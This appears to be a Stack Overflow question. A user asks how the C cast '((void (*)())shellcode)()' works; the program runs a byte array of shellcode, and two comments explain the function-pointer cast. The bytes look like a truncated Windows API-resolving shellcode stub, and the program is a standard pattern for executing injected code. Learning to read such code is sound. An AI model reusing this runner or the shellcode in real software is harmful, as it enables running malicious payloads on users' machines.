0

Can someone please walk me through this one?

unsigned char shellcode[]=
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"; 

int main(void)
{
    ((void (*)())shellcode)();
}

I know usually void(*)() is a function pointer, but isn't the first (*) supposed to be an address of some function and second () be some input parameters? I can sort of guess that both of them in this case come from the shellcode[], but can someone please explain to me how exactly.

Jonathan Leffler
  • 730,956
  • 141
  • 904
  • 1,278
tomu
  • 144
  • 1
  • 11
  • 1
    The example code shows a "call" to shellcode cast to be a function pointer. This won't work on systems with data execution prevention. – rcgldr Aug 12 '16 at 22:59
  • It's a cast. `void (*)()` is the syntax for the type "pointer to function (of unspecified arguments) returning void". You could rewrite it as: `typedef void myfun_t(); ((myfun_t *)shellcode)();` – melpomene Aug 12 '16 at 22:59

0 Answers0